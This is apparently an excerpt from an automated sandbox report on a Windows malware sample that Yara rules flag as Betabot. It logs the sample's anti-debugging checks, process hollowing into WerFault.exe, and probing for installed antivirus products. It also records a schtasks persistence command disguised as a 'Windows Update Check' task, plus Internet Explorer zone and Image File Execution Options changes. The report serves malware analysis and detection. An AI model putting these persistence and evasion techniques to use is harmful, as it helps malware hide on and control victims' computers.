                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 7_2_03B64592 Start: 03B645A1 End: 03B645A67_2_03B64592
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_028664BF LoadLibraryA,LoadLibraryA,GetProcAddress,4_2_028664BF
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02864592 rdtsc 4_2_02864592
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeCode function: 0_2_00CD120A mov eax, dword ptr fs:[00000030h]0_2_00CD120A
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeCode function: 0_2_00CD1698 mov eax, dword ptr fs:[00000030h]0_2_00CD1698
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_028651F6 mov eax, dword ptr fs:[00000030h]4_2_028651F6
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02885150 mov eax, dword ptr fs:[00000030h]4_2_02885150
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A651F6 mov eax, dword ptr fs:[00000030h]5_2_03A651F6
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A85150 mov eax, dword ptr fs:[00000030h]5_2_03A85150
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 6_2_03355150 mov eax, dword ptr fs:[00000030h]6_2_03355150
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 6_2_033351F6 mov eax, dword ptr fs:[00000030h]6_2_033351F6
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 7_2_03B651F6 mov eax, dword ptr fs:[00000030h]7_2_03B651F6
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 7_2_03B85150 mov eax, dword ptr fs:[00000030h]7_2_03B85150
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess queried: DebugPortJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess queried: DebugPortJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPortJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess queried: DebugPortJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPortJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess queried: DebugPortJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeCode function: 0_2_027728F0 LdrInitializeThunk,0_2_027728F0
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02884963 RtlAddVectoredExceptionHandler,Sleep,Sleep,4_2_02884963

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Sample uses process hollowing technique
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeSection unmapped: C:\Windows\SysWOW64\WerFault.exe base address: 180000Jump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeSection loaded: unknown target: C:\Windows\SysWOW64\WerFault.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeSection loaded: unknown target: C:\Windows\SysWOW64\WerFault.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AVPJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run MSCJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ISTrayJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AVG_UIJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run BullGuardJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WRSVCJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run emsisoft anti-malwareJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mcui_exeJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ISTrayJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ZoneAlarmJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run APVXDWINJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WRSVCJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mcpltui_exeJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run BdagentJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run AVG_UIJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run mcpltui_exeJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BdagentJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run avastJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MSCJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run AVPJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BullGuardJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BkavJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run G Data AntiVirus Tray ApplicationJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Trend Micro TitaniumJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run G Data AntiVirus Tray ApplicationJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run mcui_exeJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run avastJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZoneAlarmJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run APVXDWINJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Trend Micro TitaniumJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run emsisoft anti-malwareJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run BkavJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x03C40151" /TR "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" /RL HIGHESTJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exeJump to behavior
                      Source: zkqrKAufFycYKMdseGdhuYpyTVNu.exe, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000007.00000000.320980419.0000000001ED0000.00000002.00000001.00040000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000007.00000000.318379297.0000000001ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000000.310587078.00000000025D0000.00000002.00000001.00040000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000002.570946607.00000000025D0000.00000002.00000001.00040000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000000.308496755.00000000025D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
                      Source: zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000000.310587078.00000000025D0000.00000002.00000001.00040000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000002.570946607.00000000025D0000.00000002.00000001.00040000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000000.308496755.00000000025D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000000.310587078.00000000025D0000.00000002.00000001.00040000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000002.570946607.00000000025D0000.00000002.00000001.00040000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000000.308496755.00000000025D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_028656F5 GetTimeZoneInformation,4_2_028656F5

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Modifies Internet Explorer zone settings
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 2500Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 2500Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 2500Jump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\yvneslhpc.exe DisableExceptionChainValidationJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Betabot
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.WerFault.exe.2860000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.15.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.yvneslhpc.exe.1510000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.WerFault.exe.2860000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.yvneslhpc.exe.b70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.yvneslhpc.exe.12b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.BbbEtaIxAU.exe.ac0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.WerFault.exe.2860000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.WerFault.exe.2860000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.3.unpack, type: UNPACKEDPE
